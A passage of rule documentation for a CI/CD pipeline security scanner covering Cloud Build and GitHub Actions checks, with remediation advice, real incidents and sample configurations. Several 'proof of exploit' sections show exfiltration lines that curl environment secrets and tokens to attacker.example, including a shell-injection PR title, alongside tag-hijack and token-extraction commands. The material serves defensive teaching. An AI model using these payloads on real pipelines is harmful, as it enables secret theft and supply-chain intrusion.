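A sketch of a tagged build (the tag values are illustrative):

```yaml
tags:
  - 'prod'           # environment
  - 'backend'        # service
  - '$BRANCH_NAME'   # substitution-bearing tags count as populated; expanded at submission time
```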

Known false positives.

  • Single-purpose project-local builds in a sandbox project may legitimately not need tags. Suppress with --ignore-file if that matches.

Source: GCB-025 in the Cloud Build provider.

GCB-026: Step waitFor: references an unknown step id MEDIUM

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Cloud Build's step dependency graph is built from each step's waitFor: array. A step with no waitFor: runs after all previous steps; a step with waitFor: ['-'] runs at the start of the build; a step with waitFor: ['<id>'] waits for the specific step. There's no validation that the referenced id exists, typo'd ids are silently treated like - (no-wait), so the dependency disappears without warning. This rule catches the silent-skip by walking every waitFor: value and cross-referencing it against the set of declared step ids.

Recommendation. Verify every id listed in a step's waitFor: array matches an id: declared on a sibling step in the same build. The special token - (start at the beginning of the build, no dependencies) is the only non-id value Cloud Build accepts. A typo in waitFor: doesn't fail the build; Cloud Build silently skips the wait, so a step that was supposed to run after a setup step ends up running in parallel with it.
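A sketch of a valid dependency graph (step ids and the bucket path are hypothetical):

```yaml
steps:
  - id: fetch-config
    name: gcr.io/cloud-builders/gsutil
    args: ['cp', 'gs://my-config-bucket/app.json', '.']
  - id: lint
    name: gcr.io/cloud-builders/npm
    args: ['run', 'lint']
    waitFor: ['-']              # '-' = start immediately; the only valid non-id token
  - id: test
    name: gcr.io/cloud-builders/npm
    args: ['test']
    waitFor: ['fetch-config']   # must match a sibling id: exactly; a typo silently drops the wait
```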

Source: GCB-026 in the Cloud Build provider.

GHA-001: Action not pinned to commit SHA HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Every uses: reference should pin a specific 40-char commit SHA. Tag and branch refs (@v4, @main) can be silently moved to malicious commits by whoever controls the upstream repository, so a third-party action compromise propagates into the pipeline on the next run.

Recommendation. Replace tag/branch references (@v4, @main) with the full 40-char commit SHA. Use Dependabot or StepSecurity to keep the pins fresh.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Seen in the wild.

  • tj-actions/changed-files compromise (CVE-2025-30066, March 2025): a malicious commit retagged behind @v1 / @v45 shipped CI-secret exfiltration to roughly 23,000 repos that had pinned the action to a mutable tag instead of a commit SHA.
  • reviewdog/action-setup compromise (CVE-2025-30154, March 2025): same week, similar mechanism. Tag-pinned consumers auto-pulled the malicious version; SHA-pinned consumers were unaffected.

Proof of exploit.

Tag-pinned reference (vulnerable):

    uses: tj-actions/changed-files@v45

Attack: the upstream maintainer (or anyone who compromises the upstream repo) force-moves the v45 tag to a malicious commit:

    git tag -f v45
    git push --force origin v45

Every consumer's next workflow run pulls the new code automatically, executing the attacker's payload with the job's secrets and GITHUB_TOKEN in scope.

Safe: pin to a 40-char commit SHA (immutable):
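For example (the 40-character SHA below is a placeholder, not a real tj-actions/changed-files commit; resolve the actual one with git ls-remote, or let Dependabot maintain the pin):

```yaml
steps:
  - uses: tj-actions/changed-files@0123456789abcdef0123456789abcdef01234567   # v45 (placeholder SHA)
```

Keeping the human-readable tag in a trailing comment preserves reviewability without sacrificing immutability.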

Source: GHA-001 in the GitHub Actions provider.

GHA-002: pull_request_target checks out PR head CRITICAL 🔧 fix

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. pull_request_target runs with a write-scope GITHUB_TOKEN and access to repository secrets, deliberately so, since it's how labeling and comment-bot workflows work. When the same workflow then explicitly checks out the PR head (ref: ${{ github.event.pull_request.head.sha }} or .ref) it executes attacker-controlled code with those privileges.

Recommendation. Use pull_request instead of pull_request_target for any workflow that must run untrusted code. If you need write scope, split the workflow: a pull_request_target job that labels the PR, and a separate pull_request-triggered job that builds it with read-only secrets.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Seen in the wild.

  • GitHub Security Lab: Preventing pwn requests (2020), the canonical write-up. Demonstrates how a fork PR that lands in a pull_request_target workflow with the PR head checked out runs in the base repo's privileged context.
  • Trail of Bits Codecov-style supply chain via pwn requests (2021): showed the primitive against widely-used Actions workflows. The fix pattern (split the workflow into a privileged labeler + an unprivileged builder) is now standard guidance.

Proof of exploit.

Vulnerable: pull_request_target + checkout PR head = attacker code runs with secrets + write-scope token.

    name: build-pr
    on:
      pull_request_target:
        branches: [main]
    jobs:
      build:
        runs-on: ubuntu-latest
        steps:
          - uses: actions/checkout@
            with:
              ref: ${{ github.event.pull_request.head.sha }}
          - run: make test   # runs PR-head Makefile

Attack: any external contributor opens a fork PR with a tampered Makefile:

    test:
    	# curl -X POST https://attacker.example/exfil \
    	#   -d "$(env)" \
    	#   -d "$(git config --get-all http.https://github.com/.extraheader)"

CI runs the malicious target with the base repo's secrets (every ${{ secrets.* }} the workflow has access to) and a write-scope GITHUB_TOKEN. The PR doesn't even need to be merged or reviewed; the privileged execution happens at PR-open time.

Safe: split the workflow. The labeler runs with secrets but never checks out PR head; the builder runs in pull_request context with no secrets:

    name: triage   # privileged half
    on: { pull_request_target: { types: [opened, synchronize] } }
    jobs:
      label:
        runs-on: ubuntu-latest
        steps:
          - run: gh pr edit ${{ github.event.number }} --add-label triage
            env:
              GH_TOKEN: ${{ github.token }}

    name: build   # unprivileged half
    on: { pull_request: {} }
    jobs:
      build:
        runs-on: ubuntu-latest
        steps:
          - uses: actions/checkout@   # checks out PR head
          - run: make test            # no secrets in scope

Source: GHA-002 in the GitHub Actions provider.

GHA-003: Script injection via untrusted context HIGH 🔧 fix

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Interpolating attacker-controlled context fields (PR title/body, issue body, comment body, commit message, discussion body, head branch name, github.ref_name, inputs.*, release metadata, deployment payloads) directly into a run: block is shell injection. GitHub expands ${{ ... }} BEFORE shell quoting, so any backtick, $(), or ; in the source field executes.

Recommendation. Pass untrusted values through an intermediate env: variable and reference that variable from the shell script. GitHub's expression evaluation happens before shell quoting, so inline ${{ github.event.* }} is always unsafe.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Seen in the wild.

  • GitHub Security Lab disclosure (2020): a sweep of public Actions found dozens of widely-used workflows interpolating github.event.issue.title / pull_request.title directly into shell. Any commenter or PR author could run arbitrary commands in the maintainer's CI.
  • Trail of Bits pwn-request research (2021): demonstrated the same primitive against pull_request_target workflows where the runner has secrets and a write-scope token; one fork PR could exfiltrate every secret the workflow could see. Mitigation is the same: never interpolate context into shell, route through env:.

Proof of exploit.

Vulnerable: PR title interpolated straight into shell.

    name: triage
    on:
      pull_request_target:
        types: [opened, edited]
    jobs:
      greet:
        runs-on: ubuntu-latest
        steps:
          - run: |
              echo "New PR: ${{ github.event.pull_request.title }}"

Attack: open a PR with the title:

    foo"; curl -X POST https://attacker.example/exfil \
      -d "$(env | base64 -w0)"; echo "

GitHub expands ${{ ... }} BEFORE shell quoting, so the title's " closes the echo string and the rest of the line becomes shell. The pull_request_target trigger means the runner already has secrets and a write-scope GITHUB_TOKEN, so the curl exfils every secret the workflow can see.

Safe: route through env so the value is never interpolated into the shell template:

  - env:
      PR_TITLE: ${{ github.event.pull_request.title }}
    run: |
      echo "New PR: $PR_TITLE"

Source: GHA-003 in the GitHub Actions provider.

GHA-004: Workflow has no explicit permissions block MEDIUM 🔧 fix

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. Without an explicit permissions: block (either top-level or per-job), the GITHUB_TOKEN inherits the repository's default scope, typically write. A compromised step receives far more privilege than it needs.

Recommendation. Add a top-level permissions: block (start with contents: read) and grant additional scopes only on the specific jobs that need them.
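A sketch of the split-scope pattern (job names and commands are illustrative):

```yaml
permissions:
  contents: read        # workflow-wide least privilege

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - run: make test
  release:
    permissions:
      contents: write   # write scope granted only where it is needed
    runs-on: ubuntu-latest
    steps:
      - run: make release
```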

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Read-only / lint-only workflows that do not call any write-scoped API often pass without an explicit block because the default token scope on public repos is read. The rule defaults to MEDIUM confidence to reflect this.

Source: GHA-004 in the GitHub Actions provider.

GHA-005: AWS auth uses long-lived access keys MEDIUM 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Long-lived AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY secrets in GitHub Actions can't be rotated on a fine-grained schedule and remain valid until manually revoked. OIDC with role-to-assume yields short-lived credentials per workflow run.

Recommendation. Use aws-actions/configure-aws-credentials with role-to-assume + permissions: id-token: write to obtain short-lived credentials via OIDC. Remove the static AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY secrets.
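A sketch of the OIDC pattern (the role ARN is hypothetical, and in practice the action should be pinned to a commit SHA per GHA-001):

```yaml
permissions:
  id-token: write   # lets the job request an OIDC token
  contents: read

steps:
  - uses: aws-actions/configure-aws-credentials@v4
    with:
      role-to-assume: arn:aws:iam::123456789012:role/ci-deploy   # hypothetical role
      aws-region: us-east-1
```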

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • LocalStack and Moto integration tests set AWS_ENDPOINT_URL to a localhost address and use the sentinel test / test access keys (the LocalStack convention). Those values can't authenticate against real AWS, so the rule auto-suppresses an env block that pairs a localhost endpoint with sentinel keys.

Source: GHA-005 in the GitHub Actions provider.

GHA-006: Artifacts not signed (no cosign/sigstore step) MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Unsigned artifacts cannot be verified downstream, so a tampered build is indistinguishable from a legitimate one. The check recognizes cosign, sigstore, slsa-github-generator, slsa-framework, and notation-sign as signing tools.

Recommendation. Add a signing step, e.g. sigstore/cosign-installer followed by cosign sign, or slsa-framework/slsa-github-generator for keyless SLSA provenance. Publish the signature alongside the artifact and verify it at consumption time.
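A keyless-signing sketch (the image name and step wiring are hypothetical; the Sigstore OIDC flow additionally requires permissions: id-token: write on the job):

```yaml
steps:
  - uses: sigstore/cosign-installer@v3   # pin to a commit SHA in practice
  - run: cosign sign --yes "ghcr.io/my-org/my-app@${DIGEST}"   # sign by digest, never by tag
    env:
      DIGEST: ${{ steps.build.outputs.digest }}   # hypothetical output of an earlier build step
```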

Seen in the wild.

  • SolarWinds Orion compromise (December 2020): SUNBURST trojanized builds shipped to ~18,000 customers because no post-build signature could be checked against a trusted signing identity. Cryptographic signing of every release against a trusted identity would have given downstream consumers a verifiable way to detect the break from the legitimate build process.
  • PyTorch nightly compromise (December 2022): the torchtriton dependency was hijacked via PyPI dependency-confusion. Sigstore-style attestation tied to the official publisher would have made the impostor build fail verification rather than silently install.

Source: GHA-006 in the GitHub Actions provider.

GHA-007: SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Without an SBOM, downstream consumers cannot audit the exact set of dependencies shipped in the artifact, delaying vulnerability response when a transitive dep is disclosed. The check recognises CycloneDX, syft, Anchore SBOM action, spdx-sbom-generator, Microsoft sbom-tool, and Trivy in SBOM mode.

Recommendation. Add an SBOM generation step: anchore/sbom-action, syft . -o cyclonedx-json, Trivy with --format cyclonedx, or Microsoft's sbom-tool. Attach the SBOM to the release so consumers can ingest it into their vuln-management pipeline.
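A sketch using the Anchore SBOM action (versions and the output path are illustrative; pin to commit SHAs in practice):

```yaml
steps:
  - uses: anchore/sbom-action@v0
    with:
      format: cyclonedx-json
      output-file: sbom.cdx.json
  - uses: actions/upload-artifact@v4
    with:
      name: sbom
      path: sbom.cdx.json
```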

Source: GHA-007 in the GitHub Actions provider.

GHA-008: Credential-shaped literal in workflow body CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Every string in the workflow is scanned against a set of credential patterns (AWS access keys, GitHub tokens, Slack tokens, JWTs, Stripe, Google, Anthropic, etc., see --man secrets for the full catalog). A match means a secret was pasted into YAML, the value is visible in every fork and every build log and must be treated as compromised.

Recommendation. Rotate the exposed credential immediately. Move the value to an encrypted repository or environment secret and reference it via ${{ secrets.NAME }}. For cloud access, prefer OIDC federation over long-lived keys.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example AKIAIOSFODNN7EXAMPLE is deliberately NOT suppressed: if it appears in a real workflow it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.

Seen in the wild.

  • Uber 2016 GitHub leak: an AWS access key embedded in a private GitHub repo was reachable to attackers who got at the repo and used it to download driver / rider PII for 57 million accounts. Credential-shaped literals in any source control system (public or private) are one credential-leak away from the same outcome.
  • GitGuardian's annual State of Secrets Sprawl reports consistently find millions of fresh credential leaks per year across public commits, with a median time-to-revocation after disclosure of days, not minutes. Pinning secrets to ${{ secrets.* }} removes the artifact from source control entirely.

Proof of exploit.

Vulnerable: AWS access key pasted into the workflow body.

    env:
      AWS_ACCESS_KEY_ID: AKIAIOSFODNN7EXAMPLE
      AWS_SECRET_ACCESS_KEY: wJalrXUtnnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

Attack chain:

1. Attacker clones or forks the repo, or pulls from a public mirror. The literal is in plain text; no credentials are needed to read it.
2. Attacker uses the key against the AWS account it belongs to. With AmazonEC2FullAccess this is immediate compute hijack; with broader IAM it is full data exfiltration.
3. Even after rotation, every git revision and every CI build log retains the value; pull-request mirrors, logging back-ends, and forks all have to be scrubbed.

Safe: reference a stored secret. The value never lives in source control or build logs (GitHub redacts it from output).

    env:
      AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
      AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}

Better: use OIDC federation. No long-lived key exists.

    permissions:
      id-token: write
    steps:
      - uses: aws-actions/configure-aws-credentials@
        with:
          role-to-assume: arn:aws:iam::123456789012:role/CIRole
          aws-region: us-east-1

Source: GHA-008 in the GitHub Actions provider.

GHA-009: workflow_run downloads upstream artifact unverified CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. on: workflow_run runs in the privileged context of the default branch (write GITHUB_TOKEN, secrets accessible) but consumes artifacts produced by the triggering workflow, which is often a fork PR with no trust boundary. Classic PPE: a malicious PR uploads a tampered artifact, the privileged workflow_run downloads and executes it.

Recommendation. Add a verification step BEFORE consuming the artifact: cosign verify-attestation --type slsaprovenance ..., gh attestation verify --owner $OWNER ./artifact, or publish a checksum manifest from the trusted producer and sha256sum -c it. Treat any download from a fork as untrusted input.
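A sketch of the gh attestation variant (artifact name, binary path, and owner are hypothetical):

```yaml
steps:
  - uses: actions/download-artifact@v4
    with:
      name: build-output
  - run: gh attestation verify ./app --owner my-org   # job fails if provenance doesn't verify
    env:
      GH_TOKEN: ${{ github.token }}
```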

Source: GHA-009 in the GitHub Actions provider.

GHA-010: Local action (./path) on untrusted-trigger workflow HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. uses: ./path/to/action resolves the action against the CHECKED-OUT workspace. On pull_request_target / workflow_run, that workspace can be PR-controlled, meaning the attacker supplies the action.yml that runs with default-branch privilege.

Recommendation. Move the action to a separate repo under your control and reference it by SHA-pinned uses: org/repo@<sha>, or split the workflow so the privileged work runs only on pull_request (read-only token, no secrets) where PR-controlled action.yml can't escalate.
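A sketch of the remediation (the repo name and SHA are placeholders):

```yaml
steps:
  # Before: resolved against the checked-out (possibly PR-controlled) workspace
  #   - uses: ./.github/actions/deploy
  # After: immutable reference into a repo the PR author cannot write to
  - uses: my-org/deploy-action@0123456789abcdef0123456789abcdef01234567   # placeholder SHA
```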

Source: GHA-010 in the GitHub Actions provider.

GHA-011: Cache key derives from attacker-controllable input MEDIUM

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. actions/cache restores by key (and falls through restore-keys on miss). When the key includes a value the attacker controls (PR title, head ref, workflow_dispatch input), an attacker can plant a poisoned cache entry that a later default-branch run restores and treats as a clean build cache.

Recommendation. Build the cache key from values the attacker can't control: ${{ runner.os }}, ${{ hashFiles('**/*.lock') }} (only when the lockfile is enforced by branch protection), and the workflow file path. Never include github.event.* PR/issue fields, github.head_ref, or inputs.* in the key namespace.
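A sketch of a safe key (the npm cache path and lockfile glob are illustrative):

```yaml
steps:
  - uses: actions/cache@v4
    with:
      path: ~/.npm
      key: npm-${{ runner.os }}-${{ hashFiles('**/package-lock.json') }}   # nothing attacker-controlled
```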

Source: GHA-011 in the GitHub Actions provider.

GHA-012: Self-hosted runner without ephemeral marker MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Self-hosted runners that don't tear down between jobs leak filesystem and process state: a PR-triggered job writes to /tmp; a subsequent prod-deploy job on the same runner reads it. The mitigation is the runner's --ephemeral mode, in which the runner exits after one job and re-registers fresh. The check looks for an ephemeral label on the runs-on value; without one, the runner is presumed reusable. Recognises all three runs-on shapes: string, list, and { group, labels } dict form.

Recommendation. Configure the self-hosted runner to register with --ephemeral (the runner exits after one job and is freshly registered), and add an ephemeral label so this check can verify it. Consider actions-runner-controller for ephemeral pools.
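A sketch of both halves, registration and labeling (the org URL and token are placeholders):

```yaml
# Runner side, at registration time (placeholder URL/token):
#   ./config.sh --url https://github.com/my-org --token <reg-token> --ephemeral --labels ephemeral
jobs:
  build:
    runs-on: [self-hosted, linux, ephemeral]   # the literal 'ephemeral' label satisfies the check
```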

Known false positives.

  • Organisations using actions-runner-controller (ARC), autoscaled pools, or vendor runner fleets often use labels like arc-*, autoscaled-*, or ephemeral-pool-* instead of a bare ephemeral label. The check only matches the literal ephemeral token on runs-on; extend via a custom allow-prefix config if your fleet uses a different naming convention. Defaults to MEDIUM confidence.

Source: GHA-012 in the GitHub Actions provider.

GHA-013: issue_comment trigger without author guard HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. on: issue_comment (and discussion_comment) fires for every comment on every issue or discussion in the repository. On public repos this means any GitHub user can trigger workflow execution. If the workflow runs commands, deploys, or accesses secrets, the attacker controls timing and can inject payloads through the comment body.

Recommendation. Add an if: condition that checks github.event.comment.author_association (e.g. contains('OWNER MEMBER COLLABORATOR', ...)), github.event.sender.login, or github.actor against an allowlist. Without a guard, any GitHub user can trigger the workflow by posting a comment.
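A sketch of an author-association guard:

```yaml
on: issue_comment

jobs:
  run-on-comment:
    if: contains(fromJSON('["OWNER","MEMBER","COLLABORATOR"]'), github.event.comment.author_association)
    runs-on: ubuntu-latest
    steps:
      - run: echo "comment from a trusted association"
```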

Source: GHA-013 in the GitHub Actions provider.

GHA-014: Deploy job missing environment binding MEDIUM 🔧 fix

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Without an environment: binding, a deploy job can't be gated by required reviewers, deployment-branch policies, or wait timers. Any push to the triggering branch will deploy immediately.

Recommendation. Add environment: <name> to jobs that deploy. Configure required reviewers, wait timers, and branch-protection rules on the matching GitHub environment.
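A sketch (the environment name and deploy command are illustrative):

```yaml
jobs:
  deploy:
    runs-on: ubuntu-latest
    environment: production   # gated by the environment's required reviewers / wait timer
    steps:
      - run: ./deploy.sh
```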

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Integration-test jobs that run terraform apply or kubectl apply against a local mock (LocalStack, Moto, kind, k3d) aren't real deploys. The rule auto-suppresses a step whose env carries AWS_ENDPOINT_URL or KUBE_API_URL pointing at a localhost address.

Source: GHA-014 in the GitHub Actions provider.

GHA-015: Job has no timeout-minutes, unbounded build MEDIUM 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Without timeout-minutes, the job runs until GitHub's 6-hour default kills it. Explicit timeouts cap blast radius, cost, and the window during which a compromised step has access to secrets.

Recommendation. Add timeout-minutes: to each job, sized to the 95th percentile of historical runtime plus margin. GitHub's default is 360 minutes; an explicitly shorter value limits blast radius and runner cost.
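A sketch (the 20-minute figure is illustrative; size it to your own p95):

```yaml
jobs:
  build:
    runs-on: ubuntu-latest
    timeout-minutes: 20   # well under GitHub's 360-minute default
    steps:
      - run: make build
```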

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GHA-015 in the GitHub Actions provider.

GHA-016: Remote script piped to shell interpreter HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a workflow. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the CI runner.

Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.

Seen in the wild.

  • Codecov Bash uploader compromise (April 2021): an attacker modified the codecov.io/bash uploader script (commonly fetched via curl -s codecov.io/bash | bash) to exfiltrate environment variables from CI runners (AWS keys, GitHub tokens, signing keys) at thousands of customers for over two months before discovery.
  • Bitwarden / npm install scripts (CVE-2018-7536-class incidents): remote-script execution in CI is the same primitive. The attacker controls bytes the runner executes. Pinning a digest or hosting a vendored copy turns a perpetual ambient risk into a one-time review.

Proof of exploit.

Vulnerable: install script piped straight to bash.

    steps:
      - run: curl -sL https://example.com/install.sh | bash

Attack: an attacker who controls the install.sh endpoint (compromised CDN, expired domain, BGP hijack, account takeover, or simply being the upstream maintainer with bad intent) drops a payload that runs in the CI runner with every secret available to the job:

    #!/usr/bin/env bash
    # legitimate-looking install actions...
    # curl -X POST https://attacker.example/exfil \
    #   -d "$(env)" -d "$(cat $GITHUB_TOKEN_FILE 2>/dev/null)"

The runner has no way to know the bytes changed.

Safe: download, verify a known-good digest, then execute.

    steps:
      - run: |
          curl -sLo install.sh https://example.com/install.sh
          echo "abc123...expected_sha256  install.sh" | sha256sum -c
          bash install.sh

Source: GHA-016 in the GitHub Actions provider.

GHA-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a workflow give the container full access to the runner, enabling container escape and lateral movement.

Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GHA-017 in the GitHub Actions provider.

GHA-018: Package install from insecure source HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager invocations that use plain HTTP registries (--index-url http://, --registry=http://) or disable TLS verification (--trusted-host, --no-verify) in a workflow. These patterns allow man-in-the-middle injection of malicious packages.

Recommendation. Use HTTPS registry URLs. Remove --trusted-host and --no-verify flags. Pin to a private registry with TLS.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GHA-018 in the GitHub Actions provider.

GHA-019: GITHUB_TOKEN written to persistent storage CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Detects patterns where GITHUB_TOKEN is written to files, environment files ($GITHUB_ENV), or piped through tee. Persisted tokens survive the step boundary and can be exfiltrated by later steps, uploaded artifacts, or cache entries, turning a scoped credential into a long-lived one.

Recommendation. Never write GITHUB_TOKEN to files, artifacts, or GITHUB_ENV. Use the token inline via ${{ secrets.GITHUB_TOKEN }} in the step that needs it.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Proof of exploit.

Vulnerable: token written to a file that survives the step boundary and lands in the upload-artifact bundle.

    jobs:
      build:
        permissions: { contents: write, packages: write }
        steps:
          - run: echo "${{ secrets.GITHUB_TOKEN }}" > /tmp/token
          - run: make build   # writes /tmp/token into ./dist/
          - uses: actions/upload-artifact@
            with:
              name: build-output
              path: dist/

Attack: any contributor (or, on public repos, anyone) downloads the artifact:

    gh run download -n build-output
    cat build-output/tmp/token   # full GITHUB_TOKEN

The token is scoped to the workflow's permissions block, in this case write to contents and packages: enough to push tampered binaries to GHCR or rewrite the branch the workflow runs on. Composes with SCM-001 (unprotected default branch) into XPC-004's "open a PR, fetch artifact, ship malicious binary" loop.

Other persistence patterns the rule catches:

    echo "TOKEN=$GITHUB_TOKEN" >> $GITHUB_ENV
    echo "::set-output name=tok::$GITHUB_TOKEN"
    echo "$SECRET" | tee /tmp/cache/secret

Safe: use the token inline in the step that needs it; never write it anywhere that survives the step's environment:

  - run: gh release create v1.0.0 dist/*
    env:
      GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}

Source: GHA-019 in the GitHub Actions provider.

GHA-020: No vulnerability scanning step MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.

Recommendation. Add a vulnerability scanning step: trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.
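A sketch using Trivy's filesystem scan (the action version is illustrative; pin to a commit SHA per GHA-001):

```yaml
steps:
  - uses: aquasecurity/trivy-action@0.24.0
    with:
      scan-type: fs
      severity: CRITICAL,HIGH
      exit-code: '1'   # fail the job when findings are present
```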

Source: GHA-020 in the GitHub Actions provider.

GHA-021: Package install without lockfile enforcement MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager install commands that do not enforce a lockfile or hash verification. Without lockfile enforcement the resolver pulls whatever version is currently latest, exactly the window a supply-chain attacker exploits.

Recommendation. Use lockfile-enforcing install commands: npm ci instead of npm install, pip install --require-hashes -r requirements.txt, yarn install --frozen-lockfile, bundle install --frozen, and go install tool@v1.2.3.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GHA-021 in the GitHub Actions provider.

GHA-022: Dependency update command bypasses lockfile pins MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects pip install --upgrade, npm update, yarn upgrade, bundle update, cargo update, go get -u, and composer update. These commands bypass lockfile pins and pull whatever version is currently latest. Tooling upgrades (pip install --upgrade pip) are exempted.

Recommendation. Remove dependency-update commands from CI. Use lockfile-pinned install commands (npm ci, pip install -r requirements.txt) and update dependencies via a dedicated PR workflow (e.g. Dependabot, Renovate).

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Common build-tool bootstrapping idioms (pip install --upgrade pip, pip install --upgrade setuptools wheel virtualenv) and security-tool installs (pip install --upgrade pip-audit / cyclonedx-bom / semgrep) are exempted by the DEP_UPDATE_RE tooling allowlist. Other tooling-upgrade idioms not yet on the list can still trip the rule. The finding defaults to MEDIUM confidence, so CI gates can pass --min-confidence HIGH to ignore it.

Source: GHA-022 in the GitHub Actions provider.

GHA-023: TLS / certificate verification bypass HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.

Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.
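
A sketch of the fix-at-the-source pattern, assuming a Debian-based runner (ubuntu-latest) and a hypothetical internal CA file and artifact host:

```yaml
  # Install the internal CA once; every TLS client on the runner then
  # verifies against it. No -k, no --no-check-certificate anywhere.
  - run: |
      sudo cp internal-ca.crt /usr/local/share/ca-certificates/
      sudo update-ca-certificates
  - run: curl --fail https://artifacts.internal.example/tool.tgz -o tool.tgz
```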

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GHA-023 in the GitHub Actions provider.

GHA-024: No SLSA provenance attestation produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

